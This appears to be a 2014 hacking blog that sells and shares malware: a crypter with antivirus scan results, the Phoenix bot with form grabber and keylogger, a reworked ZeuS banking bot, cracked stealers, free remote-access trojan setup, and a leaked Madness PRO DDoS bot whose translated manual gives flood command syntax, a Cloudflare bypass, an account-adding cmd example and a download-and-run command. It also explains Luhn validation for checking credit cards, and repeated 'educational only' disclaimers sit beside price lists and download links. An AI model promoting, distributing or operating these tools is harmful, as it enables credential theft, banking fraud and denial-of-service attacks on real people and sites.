Tuesday, December 2, 2014
8:49 PM
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxkLJcpdbKVY2xA0GkVfhuO79VTyCYApTXCcqoHoqvQgJC-Ht7HEmzWhLDae0yeuzwFOBA-CtPL-JR7WIyFV_zS5O_w4KIfPP8dGcAj-Fb2dkVxT7ta2fvHPgNisIRPxS4wgY_QrVpL9lDfKNRXcgjUK0o9_MH93W_VPrxmUVB8pupZCzRj7aR=s0-d)
8:45 PM
SL4ID3R
No comments
Download from here
Results
- Object: Encryptado.exe (196 KB)
- Results: 3/23
- Started: 02/12/14
- Link: http://viruscheckmate.com/f/qFRB9YTBo1Ql
Results
- ArcaVir Antivirus 2014: Clean
- avast! Internet Security: Clean
- AVG Anti-Virus Free Edition: Clean
- Avira Antivirus Suite: TR / Crypt.XPACK.Gen
- Bitdefender Antivirus Plus 2015: Clean
- Clam AntiVirus: Clean
- COMODO Antivirus: Clean
- Dr.Web Anti-virus: Clean
- eScan Antivirus: Clean
- ESET NOD32 Antivirus: Trojan.Win32 / Injector.BQGD
- F-PROT Antivirus for Windows: Clean
- F-Secure Internet Security 2014: Clean
- FortiClient Lite: W32 / Injector.ADYQ! tr
- IKARUS anti.virus: Clean
- K7 UltimateSecurity: Clean
- Kaspersky Anti-Virus 2014: Clean
- McAfee VirusScan Enterpice: Clean
- Norman Security Suite: Clean
- Heal Internet Security quick: Clean
- Sophos Anti-Virus: Clean
- Symantec Endpoint Protection: Clean
- Total Defence Anti-Virus 2011: Clean
- Zillya! Internet Security: Clean
![[​IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vjJTsrR1Lj3P90FWsypraiK27bpz0HAc5dQUSUKKgHycKB0c7syqFHci6-3m81iQPbX4odUB5I72cqUmdcoyci6mB4sp8HR-C1aoyVNuWyJWavj4b1btKcmL9kaikGHQ5ATmsScGqioRqySsdC2TPJEZOcYhTzcVCz-fHnYJrL_SSn0EcuJPaKga_nu6_CICrOQu6ZoQ2dcw=s0-d)
![[​IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tGDeDcbMjZABxPTWEOgJBzAX-gCjkUL1ELKaA5eKtZPQ4OMU_ir9DvHq3-WLPK7rfOzvUQQSbsyCGE9mKPjyi8y_4oRzCoFnKU92Sh9Wqn0_MUw_cuP8xx1jCXgioB4Wn0X6UVW9dL2do2no92a-kt5O-i3Ei1E7faJsvMWHg5FkSZlEwBbaF9K7dgIxrHgjDIhWuKq01eeGE=s0-d)
Wednesday, November 19, 2014
- 11:53 PM
- SL4ID3R
- No comments
Hello guys !
i am going to show u all the silent pdf exploit that we have.
The scan results will be added soon.
we are having problem with proxy,
so here is the full video watch it.
i am going to show u all the silent pdf exploit that we have.
The scan results will be added soon.
we are having problem with proxy,
so here is the full video watch it.
Friday, November 14, 2014
- 8:29 PM
- SL4ID3R
- No comments
The Old Software was Binded with a virus. it had virus in it, thanks Mr; trex for the info.
i have checked it and confirmed,
We have Recracked the latest ersion and uploaded new one,
this one is clean and its ok to run,
if ur feeling suspecious feel free to run it in sandboxie and see if any extra process runs,
thanks
direct link- http://ge.tt/5etaX752/v/0?c
and Safety first ..
Tuesday, October 14, 2014
Hello Guys,
We have Released Our New under ground Forum For sharing tools and Tutorials,
I welcome all of our customers to join us,
If you want to join please email me with ur username and email,
i will send u the site to join in reply,
i will aporve u after u register there
email me at - slaidersafehacker@yahoo.com
We have Released Our New under ground Forum For sharing tools and Tutorials,
I welcome all of our customers to join us,
If you want to join please email me with ur username and email,
i will send u the site to join in reply,
i will aporve u after u register there
email me at - slaidersafehacker@yahoo.com
Wednesday, September 17, 2014
- 1:46 AM
- SL4ID3R
- 3 comments
hey guys,
i just updated the phoenix with latest fixes for grabber and botkiller,
new bin is released for all old customers .
also please contact me if u have any problems on receiving logs.
botkiller now kills all other viruses in ur systems .
form grabber now works with latest google crome, firefox and IE.
for test installs contact me.
yahoo- slaidersafehacker@yahoo.com
CAUTION!- The phoenix is only available at this site and iam the coder and reseller. donot buy from anyone else claiming to be the phoenix sellers. i am not responsible for any harm you make. its for educational purpose only
i just updated the phoenix with latest fixes for grabber and botkiller,
new bin is released for all old customers .
also please contact me if u have any problems on receiving logs.
botkiller now kills all other viruses in ur systems .
form grabber now works with latest google crome, firefox and IE.
for test installs contact me.
yahoo- slaidersafehacker@yahoo.com
CAUTION!- The phoenix is only available at this site and iam the coder and reseller. donot buy from anyone else claiming to be the phoenix sellers. i am not responsible for any harm you make. its for educational purpose only
Friday, May 30, 2014
Phonix bot Reloaded Released
After Successful Sales of previous Version Of our bot which was purely private and Limitted in copies we have decided to release The product for public sales.Do not use our tools for any malicious purposes.
We have created this for educational purposes only. Main intensions is to test the security in every system. We are not responsible for anything that you do with our tools.
We proudly present the phoenix Reloaded
- · Botkill
- · Usb spread
- · Lan spread
- · Email spreader
- · Pdf,doc extensions available
- · Form grabber works in crome , firefox,and opera
- · Form grabber bypasses ssl
- · Grabs from both http and https
- · Custom injection modules available
- · Does not affect performance of slaves pc
- · Php panels are fud so wont be loosing slaves
- · Builder+server is FUD
- · No need of cryptor
- · No dependencies coded in c++ and unknown language
- · Unicode keylogger+stealer modules are inbuilt
- · Don’t bring unwanted logs
- · Email and ftp delivery options available
- · 24*7 support via yahoo messenger
- · Persistence
- · Anti sandboxie
- · Anti vmware
- · Hides
- · modules from av
- · Geo location sketching available. Integrated with g maps
- · Stub size 22 kb
·
Stealer features
- · Steals from all email clients
- · Yahoo messenger,skype,outlook thunderbird passwords can be recovered
- · Check for new stored passwords everyday
- · Detects Unicode passwords
Scan Results
we are under constuction of support forum.
so please read the instruction under package when you recieve it.
Monday, May 26, 2014
- 11:26 PM
- SL4ID3R
- No comments
For educational PURPOSES ONLY.
How to find CC ( Credit Card Is Valid Or Not )
This is all simply by knowing the 16 digits on the front of a card.
The first digit of a card is called the Major Industry Identifier (MII). It designates the category of the entity which issued to card. This is useful in finding what exactly the card is for.
1 and 2 are Airlines,
3 is Travel and Entertainment
4 and 5 are Banking and Financial
6 is Merchandizing and Banking
7 is Petroleum
8 is Telecommunications
9 is a National assignment
The first 6 digits are the Issuer Identification Number (IIN). It will identify the institution that issued the card.
Visa: 4xxxxx
Mastercard: 51xxxx – 55xxxx
Discover: 6011xx, 644xxx, 65xxxx
Amex: 34xxxx, 37xxxx
Cards can be looked up by their IIN. A card that starts with 376211 is a Singapore Airlines Krisflyer American Express Gold Card. 529962 designates a pre-paid Much-Music MasterCard.
The 7th and following digits, excluding the final digit, are the person’s account number. This leaves a trillion possible combinations.
The 7th and following digits, excluding the final digit, are the person’s account number. This leaves a trillion possible combinations.
The final digit is the check digit or checksum. It is used to validate the credit card number using the Luhn algorithm
How to use this information to validate a credit card with your brain:
Take the below number (or any credit card number)
4417 1234 5678 9113
Now, double every other digit from the right
(4×2, 1×2, 1×2, 3×2, 5×2, 7×2, 9×2, 1×2)
Add these new digits to the undoubled ones (4, 7, 2, 4, 6, 8, 1, 3)
All double digit numbers are added as a sum of their digits, so 14 becomes 1+4.
8+4+2+7+2+2+6+4+1+0+6+1+4+8+1+8+1+2+3 = 70
If the final sum is divisible by 10, then the credit card number is valid.
If it’s not divisible by 10, the number is invalid or fake.
In this case, 70 is divisible by 10, so the credit card number is indeed valid. This works with every credit card
If you have any Credit / Debit Card U may Can check it out.
Tuesday, May 13, 2014
- 9:34 AM
- SL4ID3R
- 19 comments
This is the latest version of predator pain, once again i cracked with simplicity :DEnjoy my firends
Download - http://rghost.net/59002913
read the text file to learn how to use it
please say thanks under here,
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t61yqiGJAZ-YtDyUYc1621m6WmSoPaE6EKhCSWp-wyEzKViErIhHGUDGQoj28Wjyoxr0W2kSsRlQzvLKBVc_jHDVVkUpta421axwz4EGnzezPgceVfZYa2xxbrL2fp2ZbJrpvQR5fTkK8t9TwLTGntDynmzgtWEeQmGH6suQo=s0-d)
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAUe_R_IyAPh29kShEZsFrQkkKKIJYSJkec45ZRqfaO8O9_5uaoL6e2Ndt_KeWujzYWfCpQxE9XBKbVC0uNyaI=s0-d)
Saturday, March 15, 2014
- 11:00 PM
- SL4ID3R
- No comments
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sPLOwz9ffFpDSZvC4Y74x5EzoD0RfNob6dOdqvs_kHaClSPWpZrpOo6aHtRX3BsKghZouorW4_p-UL3KU_ufnH=s0-d)
Steals Passwords From all latest browsers
Firefox
Google Crome
Internet explorer
Safari
Opera
etc..
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sVep5ZA2j6v_MvK2MApp3DgYlEpp_ovmczbfUZaHpS52v0FuGx9L0ie_uV-BrMp_TVV3GUVjJcnlzAhHQOpuvzbEKdBnGq=s0-d)
![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v34mQZrX_jrbHtsQ-K1yF9fvDm240cNSlBJ4CYOMEpw89vqkZuEaRjHtD41dM28mGoUcSoWM3dqiyTujgSS7bJCXXGadYA=s0-d)
WORKS 100% Fine
Supports Unicode Languages like Chineese,Hindi,Thai etc..
Buy Now At 20$
AUTO BUY From HERE- Life TIme Version+ free Updates
Saturday, March 8, 2014
- 11:01 PM
- 0ldW0rm
- 5 comments
Hey guys after long days of coding and re furbishing me and my fellow crews,(slaider,reborn,smoker,trex) has decided to release the old school bot in its new featues.
added so many new features like suport for new browers in form grabber.
this is for educational only. we take no responsibilities for this tool or any harms done with it.
we totally aim for educational purposes and malware analysis.
Short description:
The Basic version:
[+] The functional ZeuS. Problem areas rewritten and corrected, inject, encryption, working with an injector, delete functions and settings are changed. The comments are not needed.
[+] Grabber FTP, Email, Saved passwords (About 20 clients)
[+] && FTP POP3 sniffer
[+] Grabber Serta from IE
[+] Formgrabber http / https (IE, FF)
[+] Support injects in IE and FF Latest versions
[+] Support for the modules, Which significantly extends the Functionality of A botnet
[+] Multi-Bot admin panel (Including Keyloggers Data parser and the Division of Rights Under the prefixes for the analysis of Downloads Several from trafogonov)
[+] Fixed Universal Keylogger, Extensible, on Request, A list of Processes (login, password, keys, Screenshots)
[+] Grabber ib / bs / IFB banks (login and password, keys, Screenshots)
[+ ] Search for Files and directories on A mask and sent to the admin
[+] Established killers of All Modifications ZeuS (ZeuS, SpyEye, Ice9, Citadel, KINS, Evolution, Thor)
[+] Deleting Files and directories on A mask
[+ ] Encrypting traffic, config modules
[+] Advanced search Bot and reporting modules for Key Words in the Reports and the comments
[+] Updated GeoIP Database, the scan on the Country Speed Increased
[+] Protection admin on trackers
[+] Gate [ 1]
[+] No shells and Backdoors to the admin area and Build of
Extended version (includes Base):
[+] Old Loader collects About the system and making the Decision to install A Bot
[+] Grabber FTP, Email, Saved passwords (about 80 clients)
[+] Formgrabber https (Chrome)
[+] Advanced Functionality in the admin
[+] Universal Keylogger (A list of Processes is Given through the admin panel)
[+] Reduce your admin area by getting RID of the Reports for the Same Day
[+] Personal Digital signature to protect Against Spoofing config / Exe for hijacking or Hacking into the Server with the admin panel
[+] Auto-Update Exe domains and through the admin panel (encryption Exe)
[+] Bot protection from trackers. Boat Will not Get into trackers, thanks to the Innovative Technology, Generating fake Web configs.
[+] Random traffic encryption algorithm for each client
[+] Ability to disable checking for GeoIP
[+] Ability to filter out Bots from specified Countries
Post here if you have eny enquries.
added so many new features like suport for new browers in form grabber.
this is for educational only. we take no responsibilities for this tool or any harms done with it.
we totally aim for educational purposes and malware analysis.
Short description:
The Basic version:
[+] The functional ZeuS. Problem areas rewritten and corrected, inject, encryption, working with an injector, delete functions and settings are changed. The comments are not needed.
[+] Grabber FTP, Email, Saved passwords (About 20 clients)
[+] && FTP POP3 sniffer
[+] Grabber Serta from IE
[+] Formgrabber http / https (IE, FF)
[+] Support injects in IE and FF Latest versions
[+] Support for the modules, Which significantly extends the Functionality of A botnet
[+] Multi-Bot admin panel (Including Keyloggers Data parser and the Division of Rights Under the prefixes for the analysis of Downloads Several from trafogonov)
[+] Fixed Universal Keylogger, Extensible, on Request, A list of Processes (login, password, keys, Screenshots)
[+] Grabber ib / bs / IFB banks (login and password, keys, Screenshots)
[+ ] Search for Files and directories on A mask and sent to the admin
[+] Established killers of All Modifications ZeuS (ZeuS, SpyEye, Ice9, Citadel, KINS, Evolution, Thor)
[+] Deleting Files and directories on A mask
[+ ] Encrypting traffic, config modules
[+] Advanced search Bot and reporting modules for Key Words in the Reports and the comments
[+] Updated GeoIP Database, the scan on the Country Speed Increased
[+] Protection admin on trackers
[+] Gate [ 1]
[+] No shells and Backdoors to the admin area and Build of
Extended version (includes Base):
[+] Old Loader collects About the system and making the Decision to install A Bot
[+] Grabber FTP, Email, Saved passwords (about 80 clients)
[+] Formgrabber https (Chrome)
[+] Advanced Functionality in the admin
[+] Universal Keylogger (A list of Processes is Given through the admin panel)
[+] Reduce your admin area by getting RID of the Reports for the Same Day
[+] Personal Digital signature to protect Against Spoofing config / Exe for hijacking or Hacking into the Server with the admin panel
[+] Auto-Update Exe domains and through the admin panel (encryption Exe)
[+] Bot protection from trackers. Boat Will not Get into trackers, thanks to the Innovative Technology, Generating fake Web configs.
[+] Random traffic encryption algorithm for each client
[+] Ability to disable checking for GeoIP
[+] Ability to filter out Bots from specified Countries
Post here if you have eny enquries.
Thursday, March 6, 2014
- 8:09 PM
- 0ldW0rm
- No comments
Note: Everything i share is only for educational Purposes Only.
Do not use it for any illegal purposes. i am not responsible in anyway for your actions .
This is a simple stealer coded by unknown coder.
Its very Effective and works 100%
No need of complex skills to install
Download Withut Survery from here- - http://j.gs/3WCV
Do not use it for any illegal purposes. i am not responsible in anyway for your actions .
This is a simple stealer coded by unknown coder.
Its very Effective and works 100%
No need of complex skills to install
Download Withut Survery from here- - http://j.gs/3WCV
Monday, January 20, 2014
- 7:03 AM
- SL4ID3R
- No comments
Hello members!
I have found A site that can directly trasnfer 100$ to ur account also u can exchange it with botcoins
Click here to join
I have found A site that can directly trasnfer 100$ to ur account also u can exchange it with botcoins
Click here to join
Friday, January 17, 2014
Hello guys!
At last i have decided to do some works for Our users!
I decided to set up Any rats for users who post under here with their emails!
the service will be through team viewer
So u must make sure u installed Team viewer before u contact me
I will give you all one free crypt with it..
and do not use them for illeagel way or missuse the tool..
i am not responsible for anything u do with it .
thanks
post ur emails below..
The serive dont cost anything and only availble for MEMEBRS OF THIS BLOG..
At last i have decided to do some works for Our users!
I decided to set up Any rats for users who post under here with their emails!
the service will be through team viewer
So u must make sure u installed Team viewer before u contact me
I will give you all one free crypt with it..
and do not use them for illeagel way or missuse the tool..
i am not responsible for anything u do with it .
thanks
post ur emails below..
The serive dont cost anything and only availble for MEMEBRS OF THIS BLOG..
Monday, January 6, 2014
![[Image: iThxTzF5fjiU.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tDWqH8z_Ul3jfVbMCyVeAw82kdlPwZo9qFoXCAz811Nw63DMVSH1pyrGNFjnh3_6h8XVp0_PoGREDGzP6BFzyqfxw14DX1Jw=s0-d)
- 8:13 PM
- rebornx
- No comments
Hello guys!
this is the giveaway of the month!
I leaked this bot from the author :P
it instructions was writern in some kind of boogy language.. i used google translate..
read it below.
------------------------------------------------------------------------------------------------------------------------------
Translated by google
------------------------------------------------------------------------------------------------------------------------------
Madness PRO
History :
In the summer of 2012 we started thinking about creating a fundamentally new DDoS
bot to test their own web resources on the fault-tolerance, since none of the systems
tested did not deserve to even estimate "4".
The test samples during devoured memory load on the CPU local machine flew with
errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing
activation of protective systems , many weighty error was found in the control panels.
To create your own system, we have studied in detail : BlackEnergy ( source code ),
gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code,
purchased under the contract ), iBot ( source code , purchased under the contract ),
w3Bot ( source) , were also studied the source code of Zeus and many other programs.
capabilities
- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Boat has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands
(all analogs parsing takes place inside a function in multiple threads - it's extra work
load on the processor . New bot enters all data in the array before the attack on the
function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP)
queries per minute through direct interaction with the network drivers , even on
desktop Windows! (only using WinSock) is about 10 times more than some few
analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system,
the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common.
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache),
which increases the load on the server .
- The protection of dialogue bot panel spetsklyuchem
Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a
suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32,
DrWeb, Avast missed a file in 100 % of cases.
Modes of attack and the team
Since the system is a professional syntax commands that look like Darkness.
dd1 basic mode of operation via HTTP protocol using GET, using sokkety.
Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;").
The fastest search volume attack.
Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2
dd2 same treatment as dd1, only the method POST.
Added optional parameter @ @ @ post_data.
It is also support for up to 10 targets.
Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh
dd3 attack on the HTTP GET method using a system library WinInet.dll.
Good old attack that is used in many Delphi bots .
Slow due to the limitations of Microsoft Windows.
Does not support referral and cookies , supports up to 10 targets.
Example : dd3 = http://host.com/script.php
dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh
dd5 ICMP attack ( pings ) . Supports up to 10 targets.
Example dd5 = 198.168.0.1; 199.0.0.1
dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text.
Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text
dd7 attack on the HTTP GET method using a system library URMON.dll
Average speed attack that supports up to 10 targets and do not support cookies and referal
cfa command to bypass the protection CloudFlare (!). ONLY used during dd7.
Not ostavnavlivaet the command dd7.
The point is simple
The bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7.
Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php
cmd command is executed on the command interpreter cmd.exe on the local machine.
Does not stop the execution of other commands.
Example : cmd = net user goodwin / add
exe command to load and run the EXE file.
Does not stop the execution of other commands.
The file is saved under the same name, under which he had been on the internet.
Made three attempts to download the file.
Example : exe = http://site.com/filename.exe
Control Panel :
We used a 70% modified of another product (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !
Prices:
- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )
- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)
- $ 950 full license ( all upgrades, rebuilds and modules are free)
discounts:
- 30% for the owners GBot / Andromeda / Dirt Dumper, basic license iBot, base / silver license Darkness
- 50 % for holders of gold and diamond license Darkness / iBot
- 20 % extra for those who acquired the products listed above are not more than a week ago.
payment
to accept POISON , WMR / WMZ / WMB, PM and LR. And as any currency through an exchanger.
Warranties :
Willingness to work through the guarantor of any known forum.
installment plan
In order to have a reputation and / or certificates of a system for people installments. Discussed individually.
Protection bypass CloudFlare.
CloudFlare security complex is based on the determination of the browser by running Java script in it,
after which the client is issued a unique cookies.
Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount
of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !
Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:
1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon.
As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .
2) A botnet command is given cga = http://server.com cookies and bots request for authorization.
Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header.
According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!
Q) Why can not I do it automatically?
A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again.
So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly
reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.
Q) Can I use this method all the time, for any purpose ?
A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is
increased due to the preparation of the special package to bypass the protection .
------------------------------------------------------------------------------------------------------------------------------
Note : inc\config.php has to be writeable
-----------------------------------------------------------
Download From here- http://q.gs/948247/madnesspro
this is the giveaway of the month!
I leaked this bot from the author :P
it instructions was writern in some kind of boogy language.. i used google translate..
read it below.
------------------------------------------------------------------------------------------------------------------------------
Translated by google
------------------------------------------------------------------------------------------------------------------------------
Madness PRO
History :
In the summer of 2012 we started thinking about creating a fundamentally new DDoS
bot to test their own web resources on the fault-tolerance, since none of the systems
tested did not deserve to even estimate "4".
The test samples during devoured memory load on the CPU local machine flew with
errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing
activation of protective systems , many weighty error was found in the control panels.
To create your own system, we have studied in detail : BlackEnergy ( source code ),
gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code,
purchased under the contract ), iBot ( source code , purchased under the contract ),
w3Bot ( source) , were also studied the source code of Zeus and many other programs.
capabilities
- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Boat has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands
(all analogs parsing takes place inside a function in multiple threads - it's extra work
load on the processor . New bot enters all data in the array before the attack on the
function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP)
queries per minute through direct interaction with the network drivers , even on
desktop Windows! (only using WinSock) is about 10 times more than some few
analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system,
the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common.
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache),
which increases the load on the server .
- The protection of dialogue bot panel spetsklyuchem
Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a
suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32,
DrWeb, Avast missed a file in 100 % of cases.
Modes of attack and the team
Since the system is a professional syntax commands that look like Darkness.
dd1 basic mode of operation via HTTP protocol using GET, using sokkety.
Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;").
The fastest search volume attack.
Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2
dd2 same treatment as dd1, only the method POST.
Added optional parameter @ @ @ post_data.
It is also support for up to 10 targets.
Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh
dd3 attack on the HTTP GET method using a system library WinInet.dll.
Good old attack that is used in many Delphi bots .
Slow due to the limitations of Microsoft Windows.
Does not support referral and cookies , supports up to 10 targets.
Example : dd3 = http://host.com/script.php
dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh
dd5 ICMP attack ( pings ) . Supports up to 10 targets.
Example dd5 = 198.168.0.1; 199.0.0.1
dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text.
Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text
dd7 attack on the HTTP GET method using a system library URMON.dll
Average speed attack that supports up to 10 targets and do not support cookies and referal
cfa command to bypass the protection CloudFlare (!). ONLY used during dd7.
Not ostavnavlivaet the command dd7.
The point is simple
The bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7.
Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php
cmd command is executed on the command interpreter cmd.exe on the local machine.
Does not stop the execution of other commands.
Example : cmd = net user goodwin / add
exe command to load and run the EXE file.
Does not stop the execution of other commands.
The file is saved under the same name, under which he had been on the internet.
Made three attempts to download the file.
Example : exe = http://site.com/filename.exe
Control Panel :
We used a 70% modified of another product (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !
Prices:
- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )
- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)
- $ 950 full license ( all upgrades, rebuilds and modules are free)
discounts:
- 30% for the owners GBot / Andromeda / Dirt Dumper, basic license iBot, base / silver license Darkness
- 50 % for holders of gold and diamond license Darkness / iBot
- 20 % extra for those who acquired the products listed above are not more than a week ago.
payment
to accept POISON , WMR / WMZ / WMB, PM and LR. And as any currency through an exchanger.
Warranties :
Willingness to work through the guarantor of any known forum.
installment plan
In order to have a reputation and / or certificates of a system for people installments. Discussed individually.
Protection bypass CloudFlare.
CloudFlare security complex is based on the determination of the browser by running Java script in it,
after which the client is issued a unique cookies.
Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount
of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !
Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:
1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon.
As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .
2) A botnet command is given cga = http://server.com cookies and bots request for authorization.
Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header.
According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!
Q) Why can not I do it automatically?
A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again.
So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly
reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.
Q) Can I use this method all the time, for any purpose ?
A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is
increased due to the preparation of the special package to bypass the protection .
------------------------------------------------------------------------------------------------------------------------------
Note : inc\config.php has to be writeable
-----------------------------------------------------------
Download From here- http://q.gs/948247/madnesspro
Subscribe to:
Posts (Atom)
